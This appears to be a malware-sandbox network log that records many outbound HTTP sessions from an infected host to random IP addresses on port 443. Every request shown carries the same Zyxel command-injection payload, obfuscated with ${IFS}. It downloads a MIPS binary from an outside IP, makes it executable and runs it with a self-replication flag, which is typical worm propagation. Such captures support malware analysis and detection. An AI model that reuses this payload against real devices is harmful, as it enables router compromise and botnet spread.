                                      Jan 14, 2024 15:51:02.692866087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8659192.168.2.1446266149.48.16.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.692900896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8660192.168.2.14388645.124.253.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.692922115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8661192.168.2.1438408114.206.97.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.692984104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8662192.168.2.144276483.225.58.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693022013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8663192.168.2.1435496156.143.165.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693079948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8664192.168.2.145717653.165.43.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693116903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8665192.168.2.1435622222.20.51.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693166971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8666192.168.2.1445058136.113.151.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693195105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8667192.168.2.1434194163.89.47.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693236113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8668192.168.2.1443642152.128.171.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693274021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8669192.168.2.143783690.148.198.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693298101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8670192.168.2.143498253.172.169.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.693331003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8671192.168.2.1452684114.224.244.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692512035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8672192.168.2.1449104213.202.217.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692646027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8673192.168.2.144268614.120.146.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692676067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8674192.168.2.1454264179.60.98.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692733049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8675192.168.2.1433530102.28.243.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692784071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8676192.168.2.1451090189.142.127.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692835093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8677192.168.2.145744231.45.55.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692882061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8678192.168.2.1453684185.161.137.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692914009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8679192.168.2.1447760120.181.107.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692948103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8680192.168.2.1457126138.19.133.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.692996979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8681192.168.2.1454518103.162.62.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693022966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8682192.168.2.1440588163.38.115.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693082094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8683192.168.2.1447952211.99.16.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693129063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8684192.168.2.1455086153.116.5.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693151951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8685192.168.2.1453118185.22.187.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693200111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8686192.168.2.1458924146.238.92.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693258047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8687192.168.2.143934832.135.94.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693295956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8688192.168.2.1460300161.166.86.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693348885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8689192.168.2.1446898101.140.106.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693382025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8690192.168.2.1459804175.43.0.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693435907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8691192.168.2.1443646101.200.54.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693454027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8692192.168.2.144357695.142.238.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693494081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8693192.168.2.144893670.35.246.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693572998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8694192.168.2.1435110101.242.190.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693597078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8695192.168.2.1450460138.51.109.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693623066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8696192.168.2.1451616113.68.156.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693646908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8697192.168.2.144902617.202.136.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693715096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8698192.168.2.1454608183.191.180.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693747044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8699192.168.2.1458156169.121.136.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693778992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8700192.168.2.145500238.50.146.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693825006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8701192.168.2.1437210159.216.210.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693859100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8702192.168.2.143648867.43.100.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693905115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8703192.168.2.143834876.21.58.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693989992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8704192.168.2.1446566103.61.49.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.693991899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8705192.168.2.1456150150.42.181.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694025040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8706192.168.2.1459460203.202.72.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694029093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8707192.168.2.144379487.170.116.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694056988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8708192.168.2.144748212.92.181.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694086075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8709192.168.2.145017253.105.30.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694125891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8710192.168.2.143288084.22.18.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694164991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8711192.168.2.145304297.236.150.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694205046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8712192.168.2.1453250128.70.207.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694211960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8713192.168.2.1449812205.47.152.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694294930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8714192.168.2.1456464160.26.5.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694322109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8715192.168.2.145162843.79.93.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694339037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8716192.168.2.1454730145.120.54.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694339037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8717192.168.2.143766441.14.219.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694351912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8718192.168.2.1437848191.91.129.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694363117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8719192.168.2.144194085.122.217.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694389105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8720192.168.2.145514831.32.69.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.694439888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8721192.168.2.144174860.86.99.205443
                                      TimestampBytes transferredDirectionData
